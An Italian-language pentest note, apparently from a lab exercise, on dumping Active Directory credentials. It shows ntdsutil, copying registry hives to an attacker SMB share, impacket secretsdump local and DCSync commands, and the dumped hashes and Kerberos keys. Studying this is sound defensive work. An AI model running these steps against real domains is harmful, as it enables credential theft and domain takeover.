Quartz 4

Domain Controller

3 min read

tags: Estrazione_Credenziali Windows_Privilage_Escalation Domain_Controller_Privilage_Escalation

Local Dumping (No Credentials)

Il seguente comando copia tutti i file che ci servono nella cartella Temp:

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

Ora traferiamo tutti i file nella macchina attaccante.

Ci creiamo un server SMB sulla nostra macchina attaccante:

 
┌──(kali㉿kali)-[/tmp]
└─$ mkdir share 
                                                                                    
┌──(kali㉿kali)-[/tmp]
└─$ python3 /opt/impacket/examples/smbserver.py -smb2support -username panino -password panino2 public share
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0

Nella macchina Windows copiamo tramite i seguenti modi:

 
#Prima ci autentichiamo
 
net use \\192.168.165.50\public /user:panino panino2
 
The command completed successfully.
 
C:\temp\registry>copy SECURITY \\192.168.165.50\public
        1 file(s) copied.
 
C:\temp\registry>copy SYSTEM \\192.168.165.50\public
        1 file(s) copied.

Ora andiamo nella cartella dove sono presenti tutti i file (in questo caso /tmp/share) e lanciamo il seguente comando:

 
python3 /opt/impacket/examples/secretsdump.py -security SECURITY -system SYSTEM -ntds ntds.dit local 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:2df7c0f9320b549f8183e2cbd6c58ea344ae88895e6666894e1cf3ba8b9ac6e960de46ce0f6c1a7321d44d2c208475703558991f7234588b5798368bdf1c0e098dc44d7636e08968a381bd1bd16497020fc6af57f9da12cdfcbd6595fe8594452b9eb751040ad8c6a6c3887e0af6995dfc91f771c68b81e3728282a428a7819a60283870bb12ba3eb2cb02ecc73cee1bf32c1e237d80d2f73d268521896c9130f6a6e6e95f1230d3d8c5481349cdd68940a8e6b428e5f3a6a3342a1a3ac900b331146ffc356aac01b8232fa01d5b7cfb852afab3911c3a227a3981133015ce632deb00f6484873df68551e7e2c0dfc1c
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:269eaa76d476784f1e3e035bb7af8e6c
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x0e88ce11d311d3966ca2422ac2708a4d707e00be
dpapi_userkey:0x8b68be9ef724e59070e7e3559e10078e36e8ab32
[*] NL$KM 
 0000   8D D2 8E 67 54 58 89 B1  C9 53 B9 
 ....
 ....
 ....

Puoi anche usare il seguente comando per estrarre solo gli hash ntlm:

sudo python3 /opt/impacket/examples/secretsdump.py -security SECURITY -system SYSTEM -ntds ntds.dit -just-dc-ntlm local
 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 55db1e9562985070bbba0ef2cc25754c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc9b72f354f0371219168bdb1460af32:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CREDS-HARVESTIN$:1008:aad3b435b51404eeaad3b435b51404ee:269eaa76d476784f1e3e035bb7af8e6c:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ec44ddf5ae100b898e9edab74811430d:::
thm.red\thm:1114:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
thm.red\victim:1115:aad3b435b51404eeaad3b435b51404ee:6c3d8f78c69ff2ebc377e19e96a10207:::
thm.red\thm-local:1116:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
thm.red\admin:1118:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
thm.red\svc-thm:1119:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
thm.red\bk-admin:1120:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
thm.red\test-user:1127:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
sshd:1128:aad3b435b51404eeaad3b435b51404ee:a78d0aa18c049d268b742ea360849666:::
[*] Cleaning up...

Remote Dumping (With Credentials)

Una volta ottenute delle credenziali per un utente possiamo estrarre hash del sistema e del controller di dominio in remoto, il che richiede credenziali, come password o hash NTLM.

Per farlo possiamo usare il seguente tool nel seguente modo:

python3 /opt/impacket/examples/secretsdump.py -just-dc THM.red/[email protected] 
 
 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc9b72f354f0371219168bdb1460af32:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ec44ddf5ae100b898e9edab74811430d:::
thm.red\thm:1114:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
thm.red\victim:1115:aad3b435b51404eeaad3b435b51404ee:6c3d8f78c69ff2ebc377e19e96a10207:::
thm.red\thm-local:1116:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
thm.red\admin:1118:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
thm.red\svc-thm:1119:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
thm.red\bk-admin:1120:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
thm.red\test-user:1127:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
sshd:1128:aad3b435b51404eeaad3b435b51404ee:a78d0aa18c049d268b742ea360849666:::
CREDS-HARVESTIN$:1008:aad3b435b51404eeaad3b435b51404ee:269eaa76d476784f1e3e035bb7af8e6c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:510e0d5515009dc29df8e921088e82b2da0955ed41e83d4c211031b99118bf30
Administrator:aes128-cts-hmac-sha1-96:bab514a24ef3df25c182f5520bfc54a0
Administrator:des-cbc-md5:6d34e608f8574632
krbtgt:aes256-cts-hmac-sha1-96:24fad271ecff882bfce29d8464d84

In questo caso l’utente è bk-admin e la sua password l’ho craccata dall’output del local dumping senza credenziali tramite hashcat.

Puoi anche estrarre solo gli hash ntlm con il seguente comando:

python3 /opt/impacket/examples/secretsdump.py -just-dc-ntlm THM.red/[email protected]
 
 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc9b72f354f0371219168bdb1460af32:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ec44ddf5ae100b898e9edab74811430d:::
thm.red\thm:1114:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
thm.red\victim:1115:aad3b435b51404eeaad3b435b51404ee:6c3d8f78c69ff2ebc377e19e96a10207:::
thm.red\thm-local:1116:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
thm.red\admin:1118:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
thm.red\svc-thm:1119:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
thm.red\bk-admin:1120:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
thm.red\test-user:1127:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
sshd:1128:aad3b435b51404eeaad3b435b51404ee:a78d0aa18c049d268b742ea360849666:::
CREDS-HARVESTIN$:1008:aad3b435b51404eeaad3b435b51404ee:269eaa76d476784f1e3e035bb7af8e6c:::
[*] Cleaning up...

Graph View